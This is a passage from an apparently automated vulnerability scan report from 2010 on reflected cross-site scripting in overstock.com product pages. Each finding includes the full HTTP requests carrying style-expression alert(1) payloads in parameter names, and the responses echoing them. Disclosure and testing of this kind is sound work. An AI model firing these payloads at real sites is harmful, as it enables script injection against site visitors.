The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb6e"style%3d"x%3aexpression(alert(1))"cfe589e8801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2eb6e"style="x:expression(alert(1))"cfe589e8801 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html?2eb6e"style%3d"x%3aexpression(alert(1))"cfe589e8801=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:08 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:08 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5067276|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:08 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408108547:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:08 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Lo
...[SNIP]...
<input type="hidden" name="2eb6e"style="x:expression(alert(1))"cfe589e8801" value="1"/>
...[SNIP]...

2.51. http://www.overstock.com/Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e395"style%3d"x%3aexpression(alert(1))"96e916c06e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e395"style="x:expression(alert(1))"96e916c06e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html?2e395"style%3d"x%3aexpression(alert(1))"96e916c06e9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:06 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5126198|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:06 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404746370:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:06 GMT; Path=/
Keep-Alive: timeout=5, max=27
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>MG
...[SNIP]...
<input type="hidden" name="2e395"style="x:expression(alert(1))"96e916c06e9" value="1"/>
...[SNIP]...

2.52. http://www.overstock.com/Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352bf"style%3d"x%3aexpression(alert(1))"4de5b594fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 352bf"style="x:expression(alert(1))"4de5b594fe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html?352bf"style%3d"x%3aexpression(alert(1))"4de5b594fe9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:52:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:52:41 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404361238:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3095577|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:41 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:41 GMT; Path=/
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="352bf"style="x:expression(alert(1))"4de5b594fe9" value="1"/>
...[SNIP]...

2.53. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5d3"style%3d"x%3aexpression(alert(1))"3cb36e7068e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5d3"style="x:expression(alert(1))"3cb36e7068e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html?3c5d3"style%3d"x%3aexpression(alert(1))"3cb36e7068e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:51 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5066840|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:51 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408211822:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="3c5d3"style="x:expression(alert(1))"3cb36e7068e" value="1"/>
...[SNIP]...

2.54. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bd"style%3d"x%3aexpression(alert(1))"da8c638786b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f8bd"style="x:expression(alert(1))"da8c638786b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html?5f8bd"style%3d"x%3aexpression(alert(1))"da8c638786b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:34 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:34 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:34 GMT; Path=/
Set-Cookie: mxcproclicks=5109988|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:34 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404774126:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="5f8bd"style="x:expression(alert(1))"da8c638786b" value="1"/>
...[SNIP]...

2.55. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1c8"style%3d"x%3aexpression(alert(1))"f71bfc3a0e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a1c8"style="x:expression(alert(1))"f71bfc3a0e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html?4a1c8"style%3d"x%3aexpression(alert(1))"f71bfc3a0e6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:58 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:58 GMT; Path=/
Set-Cookie: mxcproclicks=5110032|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:58 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404798301:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="4a1c8"style="x:expression(alert(1))"f71bfc3a0e6" value="1"/>
...[SNIP]...

2.56. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae12"style%3d"x%3aexpression(alert(1))"5a68717ae1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cae12"style="x:expression(alert(1))"5a68717ae1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html?cae12"style%3d"x%3aexpression(alert(1))"5a68717ae1c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:14 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408114741:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4870176|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:14 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:14 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118290

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="cae12"style="x:expression(alert(1))"5a68717ae1c" value="1"/>
...[SNIP]...

2.57. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d217"style%3d"x%3aexpression(alert(1))"f287cfbe090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d217"style="x:expression(alert(1))"f287cfbe090 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html?9d217"style%3d"x%3aexpression(alert(1))"f287cfbe090=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
